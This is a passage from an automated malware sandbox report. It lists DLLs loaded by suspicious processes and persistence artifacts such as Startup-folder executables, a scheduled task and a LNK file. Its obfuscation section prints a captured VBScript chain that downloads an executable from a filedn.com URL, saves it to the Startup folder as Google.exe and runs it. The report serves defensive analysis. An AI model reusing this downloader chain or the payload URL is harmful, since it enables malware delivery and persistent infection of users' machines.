                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: propsys.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: propsys.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: netapi32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: textshaping.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: twext.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: policymanager.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: msvcp110_win.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: ntshrui.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: windows.fileexplorer.common.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: cscapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: twinapi.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: starttiledata.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: acppage.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: sfc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: msi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: aepic.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: sfc_os.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: pcacli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: propsys.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                            Source: BBLXFG.lnk.2.drLNK file: ..\..\..\..\..\Windata\TXAASJ.exe
                            Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\nKtiXTO.iniJump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior

                            Data Obfuscation

                            barindex
                            VBScript performs obfuscated calls to suspicious functions
                            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Products-Pdf.exe", "false");IServerXMLHTTPRequest2.send();IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Products-Pdf.exe", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe", "2");IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Products-Pdf.exe", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe", "2");IWshShell3.Exec("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe")
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_009620F6 LoadLibraryA,GetProcAddress,2_2_009620F6
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0095020C pushfd ; retf 2_2_00950215
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0096C6CC push esi; ret 2_2_0096C6CE
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0092CB5D push edi; ret 2_2_0092CB5F
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0092CC76 push esi; ret 2_2_0092CC78
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0092CE51 push esi; ret 2_2_0092CE53
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0092CF3A push edi; ret 2_2_0092CF3C
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00927795 push ecx; ret 2_2_009277A8
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0094BB9D push FFFFFF8Bh; iretd 2_2_0094BB9F
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008F020C pushfd ; retf 11_2_008F0215
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_0090C6CC push esi; ret 11_2_0090C6CE
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008CCB5D push edi; ret 11_2_008CCB5F
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008CCC76 push esi; ret 11_2_008CCC78
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008CCE51 push esi; ret 11_2_008CCE53
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008CCF3A push edi; ret 11_2_008CCF3C
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008C7795 push ecx; ret 11_2_008C77A8
